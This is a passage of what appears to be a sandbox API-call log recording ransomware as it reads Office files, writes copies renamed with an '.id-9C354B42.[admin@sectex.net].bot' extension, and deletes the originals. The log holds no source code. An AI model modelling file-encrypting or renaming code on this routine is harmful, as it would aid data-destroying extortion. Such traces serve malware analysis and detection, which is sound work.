	[0153.821] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.821] lstrlenW (lpString=".bz2") returned 4
	[0153.821] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.821] lstrlenW (lpString=".7z") returned 3
	[0153.821] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.821] lstrlenW (lpString=".dbf") returned 4
	[0153.821] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.821] lstrlenW (lpString=".1cd") returned 4
	[0153.821] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.821] lstrlenW (lpString=".jpg") returned 4
	[0153.821] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.821] lstrlenW (lpString=".doc") returned 4
	[0153.821] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0153.821] lstrlenW (lpString=".docx") returned 5
	[0153.821] lstrcmpiW (lpString1=".docx", lpString2="D.HXS") returned -1
	[0153.821] lstrlenW (lpString=".pdf") returned 4
	[0153.821] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0153.821] lstrlenW (lpString=".xls") returned 4
	[0153.821] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0153.821] lstrlenW (lpString=".xlsx") returned 5
	[0153.821] lstrcmpiW (lpString1=".xlsx", lpString2="D.HXS") returned -1
	[0153.821] lstrlenW (lpString=".ppt") returned 4
	[0153.821] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0153.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.822] lstrlenW (lpString=".zip") returned 4
	[0153.822] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0153.822] lstrlenW (lpString=".rar") returned 4
	[0153.822] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0153.822] lstrlenW (lpString=".bz2") returned 4
	[0153.822] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0153.822] lstrlenW (lpString=".7z") returned 3
	[0153.822] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0153.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.822] lstrlenW (lpString=".dbf") returned 4
	[0153.822] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0153.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.822] lstrlenW (lpString=".1cd") returned 4
	[0153.822] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0153.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.HXS") returned 59
	[0153.822] lstrlenW (lpString=".jpg") returned 4
	[0153.822] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0153.822] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0153.822] lstrlenW (lpString="WINWORD_COL.HXC") returned 15
	[0153.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0153.856] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=631) returned 1
	[0153.856] CloseHandle (hObject=0x384) returned 1
	[0153.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc")) returned 0x20
	[0153.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0153.857] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.857] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0153.857] GetLastError () returned 0x0
	[0153.857] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x277, lpOverlapped=0x0) returned 1
	[0154.205] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0154.206] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.206] WriteFile (in: hFile=0x3e0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0154.206] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.207] CloseHandle (hObject=0x3e0) returned 1
	[0154.207] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.207] SetEndOfFile (hFile=0x384) returned 1
	[0154.209] CloseHandle (hObject=0x384) returned 1
	[0154.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxc")) returned 1
	[0154.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString=".doc") returned 4
	[0154.224] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0154.224] lstrlenW (lpString=".docx") returned 5
	[0154.224] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0154.224] lstrlenW (lpString=".pdf") returned 4
	[0154.224] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0154.224] lstrlenW (lpString=".xls") returned 4
	[0154.224] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0154.224] lstrlenW (lpString=".xlsx") returned 5
	[0154.224] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0154.224] lstrlenW (lpString=".ppt") returned 4
	[0154.224] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0154.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString=".zip") returned 4
	[0154.224] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0154.224] lstrlenW (lpString=".rar") returned 4
	[0154.224] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0154.224] lstrlenW (lpString=".bz2") returned 4
	[0154.224] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0154.224] lstrlenW (lpString=".7z") returned 3
	[0154.224] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0154.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString=".dbf") returned 4
	[0154.224] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0154.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString=".1cd") returned 4
	[0154.224] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0154.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.224] lstrlenW (lpString=".jpg") returned 4
	[0154.224] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString=".doc") returned 4
	[0154.225] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0154.225] lstrlenW (lpString=".docx") returned 5
	[0154.225] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0154.225] lstrlenW (lpString=".pdf") returned 4
	[0154.225] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString=".xls") returned 4
	[0154.225] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString=".xlsx") returned 5
	[0154.225] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0154.225] lstrlenW (lpString=".ppt") returned 4
	[0154.225] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString=".zip") returned 4
	[0154.225] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString=".rar") returned 4
	[0154.225] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0154.225] lstrlenW (lpString=".bz2") returned 4
	[0154.225] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0154.225] lstrlenW (lpString=".7z") returned 3
	[0154.225] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString=".dbf") returned 4
	[0154.225] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString=".1cd") returned 4
	[0154.225] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0154.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXC") returned 63
	[0154.225] lstrlenW (lpString=".jpg") returned 4
	[0154.225] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0154.226] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0154.226] lstrlenW (lpString="wxpr.dll") returned 8
	[0154.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wxpr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.246] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=16776) returned 1
	[0154.246] CloseHandle (hObject=0x31c) returned 1
	[0154.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wxpr.dll")) returned 0x20
	[0154.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wxpr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wxpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0154.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.277] lstrlenW (lpString=".doc") returned 4
	[0154.277] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString=".docx") returned 5
	[0154.277] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0154.277] lstrlenW (lpString=".pdf") returned 4
	[0154.277] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString=".xls") returned 4
	[0154.277] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString=".xlsx") returned 5
	[0154.277] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0154.277] lstrlenW (lpString=".ppt") returned 4
	[0154.277] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.277] lstrlenW (lpString=".zip") returned 4
	[0154.277] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString=".rar") returned 4
	[0154.277] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0154.277] lstrlenW (lpString=".bz2") returned 4
	[0154.277] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0154.277] lstrlenW (lpString=".7z") returned 3
	[0154.277] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0154.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.277] lstrlenW (lpString=".dbf") returned 4
	[0154.277] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0154.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.278] lstrlenW (lpString=".1cd") returned 4
	[0154.278] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0154.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.278] lstrlenW (lpString=".jpg") returned 4
	[0154.278] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.278] lstrlenW (lpString=".doc") returned 4
	[0154.278] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString=".docx") returned 5
	[0154.278] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0154.278] lstrlenW (lpString=".pdf") returned 4
	[0154.278] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString=".xls") returned 4
	[0154.278] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString=".xlsx") returned 5
	[0154.278] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0154.278] lstrlenW (lpString=".ppt") returned 4
	[0154.278] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.278] lstrlenW (lpString=".zip") returned 4
	[0154.278] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString=".rar") returned 4
	[0154.278] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0154.278] lstrlenW (lpString=".bz2") returned 4
	[0154.278] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0154.278] lstrlenW (lpString=".7z") returned 3
	[0154.278] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0154.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.279] lstrlenW (lpString=".dbf") returned 4
	[0154.279] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0154.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.279] lstrlenW (lpString=".1cd") returned 4
	[0154.279] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0154.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\wxpr.dll") returned 56
	[0154.279] lstrlenW (lpString=".jpg") returned 4
	[0154.279] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0154.279] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0154.279] lstrlenW (lpString="XLLEX.DLL") returned 9
	[0154.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xllex.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.296] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=37760) returned 1
	[0154.296] CloseHandle (hObject=0x268) returned 1
	[0154.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xllex.dll")) returned 0x20
	[0154.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xllex.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xllex.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0154.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.297] lstrlenW (lpString=".doc") returned 4
	[0154.297] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString=".docx") returned 5
	[0154.297] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0154.297] lstrlenW (lpString=".pdf") returned 4
	[0154.297] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString=".xls") returned 4
	[0154.297] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString=".xlsx") returned 5
	[0154.297] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0154.297] lstrlenW (lpString=".ppt") returned 4
	[0154.297] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.297] lstrlenW (lpString=".zip") returned 4
	[0154.297] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString=".rar") returned 4
	[0154.297] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.297] lstrlenW (lpString=".bz2") returned 4
	[0154.297] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.297] lstrlenW (lpString=".7z") returned 3
	[0154.297] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.297] lstrlenW (lpString=".dbf") returned 4
	[0154.297] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.297] lstrlenW (lpString=".1cd") returned 4
	[0154.297] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString=".jpg") returned 4
	[0154.298] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString=".doc") returned 4
	[0154.298] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString=".docx") returned 5
	[0154.298] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0154.298] lstrlenW (lpString=".pdf") returned 4
	[0154.298] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString=".xls") returned 4
	[0154.298] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString=".xlsx") returned 5
	[0154.298] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0154.298] lstrlenW (lpString=".ppt") returned 4
	[0154.298] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString=".zip") returned 4
	[0154.298] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString=".rar") returned 4
	[0154.298] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.298] lstrlenW (lpString=".bz2") returned 4
	[0154.298] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.298] lstrlenW (lpString=".7z") returned 3
	[0154.298] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString=".dbf") returned 4
	[0154.298] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.298] lstrlenW (lpString=".1cd") returned 4
	[0154.299] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLLEX.DLL") returned 57
	[0154.299] lstrlenW (lpString=".jpg") returned 4
	[0154.299] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.299] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0154.299] lstrlenW (lpString="XLSLICER.DLL") returned 12
	[0154.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.314] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=177536) returned 1
	[0154.314] CloseHandle (hObject=0x39c) returned 1
	[0154.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll")) returned 0x20
	[0154.343] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xlslicer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0154.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.344] lstrlenW (lpString=".doc") returned 4
	[0154.344] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString=".docx") returned 5
	[0154.344] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0154.344] lstrlenW (lpString=".pdf") returned 4
	[0154.344] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString=".xls") returned 4
	[0154.344] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString=".xlsx") returned 5
	[0154.344] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0154.344] lstrlenW (lpString=".ppt") returned 4
	[0154.344] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
	[0154.344] lstrlenW (lpString=".zip") returned 4
	[0154.344] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString=".rar") returned 4
	[0154.344] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.344] lstrlenW (lpString=".bz2") returned 4
	[0154.344] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.344] lstrlenW (lpString=".7z") returned 3
	[0154.344] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\XLSLICER.DLL") returned 60
